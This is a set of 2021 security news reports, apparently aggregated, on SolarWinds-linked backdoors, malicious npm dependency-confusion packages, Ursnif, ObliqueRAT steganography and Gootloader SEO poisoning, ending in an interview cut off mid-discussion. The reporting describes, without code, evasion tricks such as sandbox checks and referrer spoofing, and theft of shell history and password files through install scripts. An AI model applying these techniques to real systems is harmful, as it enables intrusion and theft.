Even as the different pieces of SolarWinds attack puzzle fall into place, the development once again underscores the scope and sophistication in the range of methods used to penetrate, propagate, and persist in victim environments.
"These capabilities differ from previously known NOBELIUM tools and attack patterns, and reiterate the actor's sophistication," Microsoft said. "In all stages of the attack, the actor demonstrated a deep knowledge of software tools, deployments, security software and systems common in networks, and techniques frequently used by incident response teams."
Microsoft, FireEye Unmask More Malware Linked to SolarWinds Attackers
5.3.2021 Virus Securelist
Researchers with Microsoft and FireEye found three new malware families, which they said are used by the threat group behind the SolarWinds attack.
Researchers have uncovered more custom malware that is being used by the threat group behind the SolarWinds attack.
Researchers with Microsoft and FireEye identified three new pieces of malware that the companies said are being used in late-stage activity by the threat actor (previously called Solarigate by Microsoft and now renamed Nobelium; and called UNC2542 by FireEye).
The malware families include: A backdoor that’s called GoldMax by Microsoft and called Sunshuttle by FireEye; a dual-purpose malware called Sibot discovered by Microsoft; and a malware called GoldFinder also found by Microsoft.
Adversaries were able to use SolarWinds’ Orion network management platform to infect targets by pushing out a custom backdoor called Sunburst via trojanized product updates. Sunburst was delivered to almost 18,000 organizations around the globe, starting last March. With Sunburst embedded, the attackers were then able to pick and choose which organizations to further penetrate, in a sprawling cyberespionage campaign that has hit the U.S. government, tech companies and others hard.
Microsoft said that it discovered these latest custom attacker tools lurking in some networks of customer compromised by the SolarWinds attackers. It observed them to be in use from August to September – however, researchers said further analysis revealed these may have been on compromised systems as early as last June.
“These tools are new pieces of malware that are unique to this actor,” said Ramin Nafisi and Andrea Lelli with Microsoft, in a posting on Thursday. “They are tailor-made for specific networks and are assessed to be introduced after the actor has gained access through compromised credentials or the SolarWinds binary, and after moving laterally with Teardrop and other hands-on-keyboard actions.”
GoldMax/Sunshuttle Malware
Researchers with both FireEye and Microsoft ran
across the malware called GoldMax/Sunshuttle, and published analyses about it in
joint releases. FireEye researchers said the malware’s infection vector is
unknown and that it is likely a second-stage backdoor dropped after an initial
compromise on the system. The backdoor was uploaded by a U.S.-based entity to a
public malware repository in August.
Most notable about GoldMax/Sunshuttle is the fact that it can select referrers from a list of popular website URLs (including Bing.com, Yahoo.com, Facebook.com and Google.com) to help its network traffic “blend in” with legitimate traffic — providing a stealthy way to bypass detection.
“The new Sunshuttle backdoor is a sophisticated second-stage backdoor that demonstrates straightforward but elegant detection-evasion techniques via its ‘blend-in’ traffic capabilities for command-and-control (C2) communications,” said researchers with FireEye, in a release on Thursday. “Sunshuttle would function as second-stage backdoor in such a compromise for conducting network reconnaissance alongside other Sunburst-related tools.”
Upon execution, the backdoor, written in the Go programming language, first enumerates the victim’s MAC address and compares it to a hardcoded MAC address value, which researchers say is likely a default MAC address for the Windows sandbox network adaptor. If a match is found, the backdoor exits. If not, it determines the configuration settings for the system and then requests and retrieves a “session key” for the C2 server.
“Analysis is ongoing on how the decrypted session key is used, but it is likely a session key used to encrypt content once Sunshuttle transitions to its command-and-control routines,” said researchers.
Once a session key is retrieved from the C2, the malware issues a beacon that retrieves commands, and then parses the response content to determine which command should be run. The commands from the C2 include remotely updating its configuration, uploading and downloading files, and arbitrary command execution.
Sibot Malware
Microsoft researchers also found another malware family called
Sibot, designed to achieve persistence on infected machines before downloading
and executing a payload from the C2 server.
Credit: Microsoft
Sibot is implemented in VBScript, the Active Scripting language developed by Microsoft that is modeled on Visual Basic. Researchers said that the malware’s VBScript file is given a name mimicking a legitimate Windows task, which is either stored in the registry of the compromised system or in an obfuscated format on disk. It is then run via a scheduled task.
“The scheduled task calls an MSHTA application to run Sibot via the obfuscated script,” said the researchers, who found three variants of the malware. “This simplistic implementation allows for a low footprint for the actor, as they can download and run new code without changes to the compromised endpoint by just updating the hosted DLL.”
A second-stage script is then called to download and run a payload from the remote C2 server.
GoldFinder Malware
Finally, researchers with Microsoft uncovered a new tool
also written in Golang, called GoldFinder. They said that GoldFinder is likely
used as a “custom HTTP tracer tool that logs the route or hops that a packet
takes to reach a hardcoded C2 server.”
“When launched, GoldFinder can identify all HTTP proxy servers and other redirectors such as network security devices that an HTTP request travels through inside and outside the network to reach the intended C2 server,” said researchers. “When used on a compromised device, GoldFinder can be used to inform the actor of potential points of discovery or logging of their other actions, such as C2 communication with GoldMax.”
Other SolarWinds Malware
The uncovering of these three malware families
provides another puzzle piece in better understanding the sprawling SolarWinds
espionage attack. The campaign is known to have affected various federal
departments, Microsoft, FireEye and dozens of others so far.
Other unique malware has been connected to the SolarWinds attack. In addition to Sunburst, which is the malware used as the tip of the spear in the campaign, researchers in January unmasked additional pieces of malware, dubbed Raindrop and Teardrop, that were used in targeted attacks after the effort’s initial mass Sunburst compromise.
Sunshuttle, the fourth malware allegedly linked to SolarWinds hack
5.3.2021
Virus
Securityaffairs
FireEye researchers spotted a new sophisticated second-stage backdoor that was
likely linked to threat actors behind the SolarWinds hack.
Malware
researchers at FireEye discovered a new sophisticated second-stage backdoor,
dubbed Sunshuttle, while analyzing the servers of an organization that was
compromised as a result of the SolarWinds supply-chain attack.
The new malware is dubbed Sunshuttle, and it was “uploaded by a U.S.-based entity to a public malware repository in August 2020.”
“Mandiant Threat Intelligence discovered a sample of the SUNSHUTTLE backdoor uploaded to an online multi-Antivirus scan service.” reads the analysis published by Fireeye. “SUNSHUTTLE is a backdoor, written in GO, that reads an embedded or local configuration file, communicates with its C2 server over HTTPS and supports commands including remotely updating its configuration, file upload and download, and arbitrary command execution.”
The SUNSHUTTLE backdoor was likely developed to conduct network reconnaissance alongside other SUNBURST-related tools.
Mandiant researchers discovered the SUNSHUTTLE backdoor on a system of a victim compromised by UNC2452, and believe that it is linked to this threat actor.
Experts pointed out that the SUNSHUTTLE malware was not observed using any trick to gain persistence, this means that the persistence is likely set outside of the execution of this backdoor.
The SUNSHUTTLE backdoor communicates with C2 servers passing it the values in the cookie header.
“SUNSHUTTLE uses the cookie header to pass values to the C2.” continues FireEye. “Additionally, a referrer is selected from the following list, presumably to make the traffic blend in if traffic is being decrypted for inspection:
www.bing.com
www.yahoo.com
www.google.com
www.facebook.com
The
cookie headers vary slightly depending on the operation being performed.”
Technical details and Indicators of compromise(IoCs) for this backdoor are included in the report published by FireEye.
Malicious Code Bombs Target Amazon, Lyft, Slack, Zillow
4.3.2021
Virus
Threatpost
Attackers have weaponized code dependency confusion to target internal apps at tech giants.
Researchers have spotted malicious packages targeting internal applications for Amazon, Lyft, Slack and Zillow (among others) inside the npm public code repository — all of which exfiltrate sensitive information.
The packages weaponize a proof-of-concept (PoC) code dependency-confusion exploit that was recently devised by security researcher Alex Birsan to inject rogue code into developer projects.
Internal developer projects typically use standard, trusted code dependencies that are housed in private repositories. Birsan decided to see what would happen if he created “copycat” packages to be housed instead in public repositories like npm, with the same names as the private legitimate code dependencies.
“Is it possible that some of PayPal’s internal projects will start defaulting to the new public packages instead of the private ones?” he asked. And the answer was yes.
Dependency Confusion Gains Swarms of Copycat Fans
In Birsan’s case, he tested
this “dependency confusion” using benign PoC code blocks. These were uploaded to
public repositories – and he simply sat back and waited to see if they would be
imported. His hunch proved correct, demonstrating how outside code can be
imported and propagated through a targeted company’s internal applications and
systems, with relative ease — including at Apple, Microsoft, Netflix, PayPal,
Shopify, Tesla and Uber.
In all, he received more than $130,000 in bug bounties and pre-approved financial arrangements with targeted organizations from the experiment, who all had agreed to be tested. This has spawned legions of copycat bounty hunters looking to reap a payday – there were 275+ such packages uploaded to the npm repository within 48 hours of Birsan’s research being published, according to a Sonatype analysis. The number has now jumped to more than 700, Sonatype said on Tuesday, with malicious actors wading into the mix.
“An ethical researcher will typically post a package under the same name as the private dependency to a public repository like npm,” Sonatype researcher Ax Sharma explained to Threatpost in an interview. “Except, their package would contain enough minimal PoC code to demonstrate the attack to the vendor and the bug-bounty program. The ethical research packages seen by Sonatype also had disclaimers in place indicating these were a part of ethical security research, which gives some reassurance.”
Dependency Confusion Becomes Malicious
Unfortunately, Sonatype also
identified several malicious packages, showing that the technique is being
weaponized.
“Some of the dependency-confusion copycat packages take what may be deemed ‘ethical research’ a step further, by engaging in outright malicious activities,” Sharma explained.
Several of the copycat packages Sonatype identified exfiltrate, for example, the user’s .bash_history files and /etc/shadow files.
The .bash_history file contains a list of commands previously executed by a Unix-based OS user at the terminal. Unless periodically cleared, this file can contain the usernames, passwords and other sensitive data.
The /etc/shadow file meanwhile maintains hashed password data of user accounts on a system. Although the file is typically restricted to “super user” accounts, a malicious actor could obtain the file should the infected machine be running npm with elevated privileges.
“These typically contain highly sensitive information that should remain unseen,” Sharma explained. “Some of these packages also established a reverse shell to their author’s servers, and had no obvious disclaimers or indications in place to clarify if this was part of ethical research, or a bug-bounty program.”
Easy, Automatic Compromise
Exacerbating the danger from these packages is the
fact that these types of code imports are done automatically – when a new
version becomes available, a developer project will automatically fetch it from
a repository.
“What makes this trend even more problematic is that dependency confusion — because of its very nature — needs no action on the victim’s part,” Sharma explained. “Considering these malicious packages could share names with internal dependencies being used by leading organizations, they can be pulled almost instantaneously into the organizations’ builds.”
Unfortunately, it’s also fairly easy to identify what those internal dependencies are, even if they’re technically private.
“What ethical researchers typically do is monitor an organization’s public GitHub repository or CDN for code,” Sharma said. “This code may reveal the names of their internal dependencies (e.g. in the manifest files), not otherwise available on public repositories like npm, RubyGems or GitHub. At least, that is how Alex Birsan did it, but there remains room to be creative.”
And further, because the copycat packages are uploaded to public repositories, there’s little barrier to entry for malicious attackers. This is the same problem that’s often found in software supply-chain attacks involving typosquatting and brandjacking of public packages.
“Anybody — whether ethical researchers or malicious actors — can exploit the dependency confusion issue,” Sharma said. “What constitutes ‘ethical’ or not is largely determined by the actor’s intent.”
Amazon, Lyft, Slack and Zillow Copycat Packages
Researchers uncovered
malicious packages targeting a variety of companies, but four aimed at Amazon,
Lyft, Slack and Zillow stood out.
The npm webpage for “amzn” offers two identical versions of a malicious package, each of which contains just two files: a manifest called package.json, and the functional run.js file. The “amzn” package that has names analogous to Amazon’s GitHub repository and open source packages, according to researchers.
“Inside run.js is where we see the contents of the /etc/shadow file being accessed and ultimately exfiltrated to the package’s author to domain the comevil[.]fun,” according to the analysis. “The code also has the author opening a reverse shell to their server which would spawn as soon as the `amzn` package infiltrates the vulnerable build.”
As for Zillow, the package “zg-rentals” was also posted to npm by the same author, and is identical in structure and functionality to the “amzn” package, researchers said. Neither offers any indication or disclaimer that they could be linked to an ethical research effort, according to the Sonatype analysis.
Meanwhile, the malicious “serverless-slack-app” package also has no clear-cut sign that it’s linked to an ethical research or a bug-bounty program. It’s named after a legitimate package made by an Atlassian developer. It has both preinstall and postinstall scripts launched by the manifest file, according to Sonatype.
“While the index.js script spun up at the preinstall stage is an identical replica of that in Birsan’s PoC research packages, the postinstall script is particularly interesting,” according to the post. “At the postinstall stage, another script hosted on GitHub is run that sends the user’s .bash_history file to the author behind serverless-slack-app.”
The same author published a near-identical Lyft package, called lyft-dataset-sdk, which shares a name with a Python-based package used by Lyft.
“I was starting to wonder when we were going to see a malicious actor take advantage of the current situation,” Sonatype security researcher Juan Aguirre said, in the posting. “Finally, we’ve spotted one.”
He added, “It’s interesting to look at all the malicious npm copycat packages released recently. You can see their evolution. They start out with pretty much the same code base as the PoC released by researcher Alex Birsan and they gradually start getting creative.”
The Ursnif Trojan has hit over 100 Italian banks
4.3.2021
Virus
Securityaffairs
Avast researchers reported that the infamous Ursnif Trojan was employed in
attacks against at least 100 banks in Italy.
Avast experts recently obtained
information on possible victims of Ursnif malware that confirms the interest of
malware operators in targeting Italian banks.
Operators behind this attacks have stolen financial data and credential from targeted financial institutions.
“Among the countries Ursnif has significantly impacted is Italy, a fact that we
found reflected in the information our researchers obtained.” reads the analysis
published by Avast. “Specifically we found usernames, passwords, credit card,
banking and payment information that appears to have been stolen from Ursnif
victims by the malware operators. We saw evidence of over 100 Italian banks
targeted in the information we obtained. We also saw over 1,700 stolen
credentials for a single payment processor.”
According to data obtained by
Avast, at least 100 Italian banks have been targeted with the Ursnif Trojan and
in one case, crooks stolen over 1,700 sets of credentials from an unnamed
payment processor.
Ursnif is one of the most and widespread common threats today delivered through
malspam campaigns. It appeared on the threat landscape about 13 years ago and
gained its popularity since 2014 when its source code was leaked online giving
the opportunity to several threat actors to develop their own version.
Avast
researchers shared their findings with the impacted payment processors and banks
and Italian authorities and financial CERTs, including CERTFin.
“With this information these companies and institutions are taking steps to protect their customers and help them recover from the impact of Ursnif.” concludes AVAST.
Hackers Now Hiding ObliqueRAT Payload in Images to Evade Detection
4.3.2021
Virus
Thehackernews
Cybercriminals are now deploying remote access Trojans (RATs) under the guise of seemingly innocuous images hosted on infected websites, once again highlighting how threat actors quickly change tactics when their attack methods are discovered and exposed publicly.
New research released by Cisco Talos reveals a new malware campaign targeting organizations in South Asia that utilize malicious Microsoft Office documents forged with macros to spread a RAT that goes by the name of ObliqueRAT.
First documented in February 2020, the malware has been linked to a threat actor tracked as Transparent Tribe (aka Operation C-Major, Mythic Leopard, or APT36), a highly prolific group allegedly of Pakistani origin known for its attacks against human rights activists in the country as well as military and government personnel in India.
While the ObliqueRAT modus operandi previously overlapped with another Transparent Tribe campaign in December 2019 to disseminate CrimsonRAT, the new wave of attacks differs in two crucial ways.
In addition to making use of a completely different macro code to download and deploy the RAT payload, the operators of the campaign have also updated the delivery mechanism by cloaking the malware in seemingly benign bitmap image files (.BMP files) on a network of adversary-controlled websites.
"Another instance of a maldoc uses a similar technique with the difference being
that the payload hosted on the compromised website is a BMP image containing a
ZIP file that contains ObliqueRAT payload," Talos researcher Asheer Malhotra
said. "The malicious macros are responsible for extracting the ZIP and
subsequently the ObliqueRAT payload on the endpoint."
Regardless of the infection chain, the goal is to trick victims into opening emails containing the weaponized documents, which, once opened, direct victims to the ObliqueRAT payload (version 6.3.5 as of November 2020) via malicious URLs and ultimately export sensitive data from the target system.
But it's not just the distribution chain that has received an upgrade. At least four different versions of ObliqueRAT have been discovered since its discovery, which Talos suspects are changes likely made in response to previous public disclosures, while also expanding on its information-stealing capabilities to include a screenshot and webcam recording features and execute arbitrary commands.
The use of steganography to deliver malicious payloads is not new, as is the abuse of hacked websites to host malware.
In June 2020, Magecart groups were previously found to hide web skimmer code in the EXIF metadata for a website's favicon image. Earlier this week, researchers from Sophos uncovered a Gootkit campaign that leverages Search Engine Optimization (SEO) poisoning in hopes of infecting users with malware by directing them to fake pages on legitimate but compromised websites.
But this technique of using poisoned documents to point users to malware hidden in image files presents a shift in infection capabilities with an aim to slip through without attracting too much scrutiny and stay under the radar.
"This new campaign is a typical example of how adversaries react to attack disclosures and evolve their infection chains to evade detections," the researchers said. "Modifications in the ObliqueRAT payloads also highlight the usage of obfuscation techniques that can be used to evade traditional signature-based detection mechanisms."
Malware Loader Abuses Google SEO to Expand Payload Delivery
2.3.2021 Virus Threatpost
Gootloader has expanded its payloads beyond the Gootkit malware family, using Google SEO poisoning to gain traction.
The Gootloader malware loader, previously used for distributing the Gootkit malware family, has undergone what researchers call a “renaissance” when it comes to payload delivery.
New research released this week paints Gootloader as an increasingly sophisticated loader framework, which has now expanded the number of payloads its delivers beyond Gootkit (and in some cases, the previously-distributed REvil ransomware), to include the Kronos trojan and the Cobalt Strike commodity malware.
Gootloader is known for its multi-stage attack process, obfuscation tactics, and for using a known tactic for malware delivery called search engine optimization (SEO) poisoning. This technique leverages SEO-friendly terms in attacker-controlled websites, in order to rank them higher in Google’s search index. In the end, the method brings more eyeballs to the malicious sites, which contain links that launch the Gootloader attack chain.
“The malware delivery method pioneered by the threat actors behind the REvil ransomware and the Gootkit banking Trojan has been enjoying a renaissance of late, as telemetry indicates that criminals are using the method to deploy an array of malware payloads in South Korea, Germany, France, and across North America,” said Gabor Szappanos and Andrew Brandt, security researchers with Sophos Labs on Monday.
What is the Gootloader Malware Tool?
Gootloader is a Javascript-based
infection framework that was traditionally used for the Gootkit remote access
trojan (RAT). The Gootkit malware family, which has been around for more than
five years, has evolved over time into a mature trojans primarily aimed at
stealing banking credentials.
While Gootloader was previously used as a vehicle to merely deliver the Gootkit malware, “In recent years, almost as much effort has gone into improvement of its delivery method as has gone into the NodeJS-based malware itself,” said researchers.
In addition to its use of SEO poisoning, what sets Gootloader apart is its fileless malware delivery tactics, they said. Fileless malware uses trusted, legitimate processes (in the case of Gootloader, PowerShell, for instance) that allows the malware delivery mechanism to evade antivirus products.
Gootloader Malware: Compromised, Legitimate Websites
In order to perform SEO
poisoning, Gootloader attackers have first compromised a wide variety of
legitimate websites, which they maintain on a network of roughly 400 servers,
said researchers.
An example of an Gootloader attack. Credit: Sophos Labs
Researchers said, the operators of these legitimate, hacked websites do not seem to know their websites are being abused in this manner.
“It isn’t clear how the threat actors gain access to the backend of these sites, but historically, these kinds of website compromises may be the result of any of a number of methods: The attackers may simply obtain the sites’ passwords from the Gootkit malware itself, or from any of a number of criminal markets that trade in stolen credentials, or by leveraging any of a number of security exploits in the plugins or add-ons of the CMS software,” they said.
Using Google Search Engine Optimization For Malware Delivery
Gootloader
attacker-compromised websites then tweak the content management systems of the
websites to use key SEO tactics and terms. The goal here is to appear at the top
of Google’s index when certain questions are typed into Google search.
For instance, typing the question “do I need a party wall agreement to sell my house?” turns up a legitimate website for a Canada-based neonatal medical practice, which has actually been compromised by Gootloader attackers.
The part of the website that has been compromised by attackers features a “message board” with a “user” asking the question “do I need a party wall agreement to sell my house?” This uses the exact same wording as the search query, as a way to rank higher on Google’s search index – even if it has nothing to do with the actual content of the compromised website.
An example of an Gootloader attack. Credit: Sophos Labs
On that “message board,” an “admin profile” then responds to the question with a link purporting to have more information.
“None of the site’s legitimate content has anything to do with real estate transactions – its doctors deliver babies – and yet it is the first result to appear in a query about a very narrowly defined type of real estate agreement,” said researchers. “Google itself indicates the result is not an ad, and they have known about the site for nearly seven years. To the end user, the entire thing looks on the up-and-up.”
Threatpost has reached out to Google for more information on how the company is battling such SEO poisoning types of attacks.
Gootloader Payload Delivery Mechanism
Gootloader’s payload delivery mechanism
is complex and involves multiple stages.
Initially, when the website user clicks on the “admin” account’s link on the compromised website, they receive a ZIP archive file with a filename (again matching the search query terms used in the initial search). This file then contains another JS file (with the same name). JS extension files involve a text file containing JavaScript code, used to execute JavaScript instructions in webpages; the specific JS files in this attack typically invoke the Windows Scripting Host (wscript.exe) when run.
“This .js file is the initial infector, and the only stage of the infection at which a file is written to the filesystem,” said researchers. “Everything that happens after the target double-clicks this script runs entirely in memory, out of the reach of traditional endpoint protection tools.”
The first-stage script, which is obfuscated, attempts to contact the command-and-control (C2) server – if it successfully does so, the second-stage malware process then creates an auto-run entry for a PowerShell script that doesn’t execute until the system reboots, creating a stealthy way for attackers to sidestep detection.
“Because this next stage doesn’t completely execute until the next time the computer reboots, the target may not actually discover the infection until some hours or even days later – whenever they fully reboot Windows,” said researchers.
Once the computer reboots, the PowerShell script runs and begins a dominoes-like sequence of events, ending with Gootloader attempting to download its final payload.
“The Delphi loader contains the final payload – Kronos, REvil, Gootkit, or Cobalt Strike – in encrypted form,” said researchers. “In those cases, the loader decrypts the payload, then uses its own PE loader to execute the payload in memory.”
Other Malware Google SEO Abuse Tactics
The abuse of SEO to gain more eyeballs
and traction to malicious sites is an age-old trick for cybercriminals, with
examples of this type of tactic dating back to at least 2011. In 2017,
cybercriminals poisoned Google search results in the hope of infecting users
with a banking Trojan called Zeus Panda, for instance.
These types of attacks continue because they work, said researchers.
“Script blockers like NoScript for Firefox could help a cautious web surfer remain safe by preventing the initial replacement of the hacked web page to happen, but not everyone uses those tools (or finds them convenient or even intuitive),” they said. “Even attentive users who are aware of the trick involving the fake forum page might not recognize it until it’s too late.”
Gootkit delivery platform Gootloader used to deliver additional payloads
2.3.2021
Virus
Securityaffairs
The Javascript-based infection framework for the Gootkit RAT was enhanced to
deliver a wider variety of malware, including ransomware.
Experts from Sophos
documented the evolution of the “Gootloader,” the framework used for delivering
the Gootkit RAT banking Trojan. The framework was improved to deploy a wider
range of malware, including ransomware payloads.
“In recent years, almost as much effort has gone into improvement of its delivery method as has gone into the NodeJS-based malware itself.” reads the analysis published by researchers Gabor Szappanos and Andrew Brandt from Sophos.
“In addition to the REvil and Gootkit payloads, Gootloader has been used most recently to deliver the Kronos trojan and Cobalt Strike. In its latest attempts to evade detection by endpoint security tools, Gootloader has moved as much of its infection infrastructure to a “fileless” methodology as possible.”
The Gootkit delivery platform was used by multiple threat actors to deliver ransomware and other malware, including the REvil ransomware, the Kronos trojan, and Cobalt Strike.
Recently Gootloader attempted to evade detection has started using “fileless” methodology.
Telemetry reveals that crooks are using this technique to spread multiple payloads in South Korea, Germany, France, and across North America.
The framework uses black search engine optimization (SEO) techniques to poison Google search results and spread links pointing to the malware.
When the visitor clicks on the link provided by the search engine, they are redirected to landing pages that answer their exact questions, using the same wording as the search query.
“And if that same site visitor clicks the “direct download link” provided on this page, they receive a .zip archive file with a filename that exactly matches the search query terms used in the initial search, which itself contains another file named in precisely the same way.” continues the analysis. “This .js file is the initial infector, and the only stage of the infection at which a malicious file is written to the filesystem. Everything that happens after the target double-clicks this script runs entirely in memory, out of the reach of traditional endpoint protection tools.”
Many of the hacked sites employed in the attacks observed by Sophos were serving
the fake message board and were running a well-known CMS. It isn’t clear how the
attackers gain access to the backend of these sites, but experts speculate the
compromises may be the result of any of attacks based on sites’ passwords
obtained though the Gootkit malware, or from past data breaches, or by
leveraging security exploits in the plugins or add-ons.
Gootloader infection process is multi-stage, it begins with a .NET loader, which comprises a Delphi-based loader malware, which, in turn, contains the final payload in encrypted form.
“The developers behind Gootkit appear to have shifted resources and energy from delivering just their own financial malware to creating a stealthy, complex delivery platform for all kinds of payloads, including REvil ransomware,” conclude the experts. “This shows that criminals tend to reuse their proven solutions instead of developing new delivery mechanisms. Further, instead of actively attacking endpoint tools as some malware distributors do, the creators of Gootloader have opted for convoluted evasive techniques that conceal the end result,”
Gootkit RAT Using SEO to Distribute Malware Through Compromised Sites
2.3.2021
Virus
Thehackernews
A framework notorious for delivering a banking Trojan has received a facelift to deploy a wider range of malware, including ransomware payloads.
"The Gootkit malware family has been around more than half a decade – a mature Trojan with functionality centered around banking credential theft," Sophos researchers Gabor Szappanos and Andrew Brandt said in a write-up published today.
"In recent years, almost as much effort has gone into improvement of its delivery method as has gone into the NodeJS-based malware itself."
Dubbed "Gootloader," the expanded malware delivery system comes amid a surge in the number of infections targeting users in France, Germany, South Korea, and the U.S.
First documented in 2014, Gootkit is a Javascript-based malware platform capable of carrying out an array of covert activities, including web injection, capturing keystrokes, taking screenshots, recording videos, as well as email and password theft.
Over the years, the cybercrime tool has evolved to gain new information-stealing features, with the Gootkit loader repurposed in combination with REvil/Sodinokibi ransomware infections reported last year.
While campaigns using social engineering tricks to deliver malicious payloads are a dime a dozen, Gootloader takes it to the next level.
The infection chain resorts to sophisticated techniques that involve hosting
malicious ZIP archive files on websites belonging to legitimate businesses that
have been gamed to appear among the top results of a search query using
manipulated search engine optimization (SEO) methods.
What's more, the search engine results point to websites that have no "logical" connection to the search query, implying that the attackers must be in possession of a vast network of hacked websites. In one case spotted by the researchers, an advice for a real estate agreement surfaced a breached neonatal medical practice based in Canada as the first result.
"To ensure targets from the right geographies are captured, the adversaries rewrite website code 'on the go' so that website visitors who fall outside the desired countries are shown benign web content, while those from the right location are shown a page featuring a fake discussion forum on the topic they've queried," the researchers said.
Clicking the search result takes the user to a fake message board-like page that matches not only the search terms used in the initial query but also includes a link to the ZIP file, which contains a heavily obfuscated Javascript file that initiates the next stage of compromise to inject the fileless malware fetched from a remote server into memory.
This takes the form of a multi-stage evasive approach that begins with a .NET loader, which comprises a Delphi-based loader malware, which, in turn, contains the final payload in encrypted form.
In addition to delivering the REvil ransomware and the Gootkit trojan, multiple campaigns have been spotted currently leveraging the Gootloader framework to deliver the Kronos financial malware in Germany stealthily, and the Cobalt Strike post-exploitation tool in the U.S.
It's still unclear as to how the operators gain access to the websites to serve the malicious injects, but the researchers suspect the attackers may have obtained the passwords by installing the Gootkit malware or purchasing stolen credentials from underground markets, or by leveraging security flaws in present in the plugins used alongside content management system (CMS) software.
"The developers behind Gootkit appear to have shifted resources and energy from delivering just their own financial malware to creating a stealthy, complex delivery platform for all kinds of payloads, including REvil ransomware," said Gabor Szappanos, threat research director at Sophos.
"This shows that criminals tend to reuse their proven solutions instead of developing new delivery mechanisms. Further, instead of actively attacking endpoint tools as some malware distributors do, the creators of Gootloader have opted for convoluted evasive techniques that conceal the end result," he added.
Malware Gangs Partner Up in Double-Punch Security Threat
27.2.2021
Virus
Threatpost
From TrickBot to Ryuk, more malware cybercriminal groups are putting their heads together when attacking businesses.
Cybergangs are joining forces under the guise of affiliate groups and “as-a-service” models, warns Maya Horowitz, the director of threat intelligence research with Check Point Research. She said the trend is driving a new and thriving cybercriminal underground economy.
Several malware gangs have paired up over the past year – such as the FIN6 cybercrime group and the operators of the TrickBot malware. The purpose is help the other fill criminal skill gaps and ultimately be a more potent threat to victims.
“In some cases, it’s just an as-a-service model, so the groups don’t necessarily have to know each other,” Horowitz said. “But in many cases, the cooperation is so tight, that we have to assume that there’s something there behind the scenes, that these groups actually communicate and complete each other’s gaps in the attack chain.”
Horowitz talks about these partnerships and what they mean for victims, during this week’s ThreatpostNOW video interview.
Watch the full video below, or download here.
Below is a lightly edited transcript of the interview.
Lindsey Welch: Welcome to ThreatpostNOW, Threatpost’s video segment, where we do deep-dive interviews with cybersecurity experts about the top security threats, challenges and trends facing businesses today. I’m joined today by Maya Horowitz, the director of threat intelligence research with Check Point Research. Maya is responsible for leading the intelligence and research efforts while leveraging her team’s analysis into threat prevention products. Since Maya joined Check Point, almost seven years ago, she has successfully discovered and exposed many, many new cyber threat campaigns. So Maya, thank you so much for joining me today.
Maya Horowitz: Great to be here.
LW: This week, CPX 360 kicks off. And I wanted to get your thoughts on some of the biggest threats that we should be on the look out for in the year ahead. I know, we talked, I think it was a year ago actually, in New Orleans about what you were seeing then. And certainly a lot has changed both in the cybersecurity landscape, but also globally with the COVID-19 pandemic, and, and everything else. So Maya in terms of what you’re seeing, what are some of the most active cybercriminal threat groups or APT groups that we should be on the lookout for this year?
Top Malware Families to Watch Out For
MH: So actually, the leading malware or
the leading threat group for 2020 was Emotet. And just a couple of weeks ago, it
was taken down. We don’t know at which extent yet but, at least for now, this
malware is not a threat.
But I guess the question is, who will take the top place in our most wanted malware? And from our statistics, it looks like the answer would probably be one of the following: Either Phorpiex, maybe Dridex, maybe QBot, all very, very broadly used malware botnets. But the question is not only which of them would be most popular, but it’s also about partnerships. So with Emotet, it wasn’t only about the botnet, it was actually the next-stage payloads that that were very severe, because they had partnerships with some of the top ransomware families.
And so I think the question is both about the distribution of the botnet, but also what the next-stage malware will be, and which of them will be able to distribute some of the top ransomware, like, Ryuk and others. So I guess we’ll have to wait and see which of them takes takes the lead.
Ransomware Gangs Make Key Partnerships
LW: Right. And that’s a really good
point too about the partnership aspect of it. I know, for instance, we’ve seen
TrickBot being used to deploy further ransomware and other types of malware as
well. And we’ve seen a lot of really interesting partnerships between different
malware variants. And, as you mentioned, Emotet, the recent takedown of Emotet
has had a very interesting shape shaping of the malware landscape now and also
we’ve seen a couple of other similar takedown efforts and arrest efforts,
including with Egregor and other ones. So can you talk a little bit more about
the these partnerships and how they continue to really shape the cybersecurity
malware landscape?
MH: Yeah, I guess many threat groups learned that they can’t be, say full stack, with the entire tech chain. So each group or each individual has their own added value, so it could be the distribution, right? So it could be you know, I’m the best at sending many emails, right I have the mailing lists and I can send many emails, someone else would have the technique on how to make people click the link or open the malicious document. And another would have the technique on how to actually then install the malware. From there, lateral movement is something else, getting the initial intelligence about the network is something else. And eventually, the part that does the damage is another thing. And we know that in many attack chains, we do have separate people or groups for each of these parts. So with Emotet, this was both the emails and the initial payload or the botnet, but then it would sometimes move on to TrickBot to do the lateral movement, and then say to Ryuk as the ransomware. So in some cases, it’s just as-a-service model, so the groups don’t necessarily have to know each other. But in many cases, the cooperation is so tight, that we have to assume that there’s something there behind the scenes that these groups actually communicate and complete each other’s gaps in the attack chain.
Malware: As-a-Service Models Versus Partnerships
LW: Right, I was gonna ask,
when you have those types of attack chain operations, where multiple strains of
malware are being used, what are you seeing there in terms of, is it usually one
group who is using an as-a-service model, as you mentioned before? What’s the
benefits of groups who are working together? How might they kind of split up the
ensuing profit? And how does that work really on the back end?
MH: So I can’t really comment on the back end, and how they would split the revenue. And it also varies. In some cases, they would just split, in other cases, they would just pay for the service, doesn’t matter if they actually got the money from the victim eventually or not. And I guess that that’s also part of whether it’s as-a-service or an actual collaboration and joint venue. But by the way, in some cases, it’s just we even see it with some APT groups that for parts of the attack chain, they would use malware-as-a-service. And it could be just to save on the time and resources in order to create this part of the attack, but also could be for the smokescreen, or for or so that researchers won’t be able to understand who the attackers are because they’re using generic tools. So we are seeing all these types of collaborations between different groups, but it’s not only cyber criminals, it’s also APTs.
LW: Right, and regardless, this is not a good thing for the victims, I mean, this is innovation happening across the sphere there on the cybercriminal side of things. So not great for different businesses who are dealing with these attacks, for sure.
MH: Yes, but there is also a bright side, because especially mentioning APTs, if they use the same tools used by cyber criminals, maybe these are sometimes tools that are also easier to detect and to block.
COVID-19 Pandemic: Cybercriminals Shift Lures to Remote Work
LW: Yeah, that’s
a really good point, for sure. Now I did want to mention, the ongoing pandemic,
we’ve been living with COVID-19 for a while now, and cybercriminals have
certainly kept up with that, unfortunately, been, they’ve been updating their
TTPs and lures to really tap into the different themes that we’ve seen with the
pandemic, as well as really the emotions just on the side of victims. So how
have you seen the cybercriminal space evolve over the past year to leverage the
pandemic, as well as kind of this shift that we’ve had to remote work?
mobile phishing attack pharma
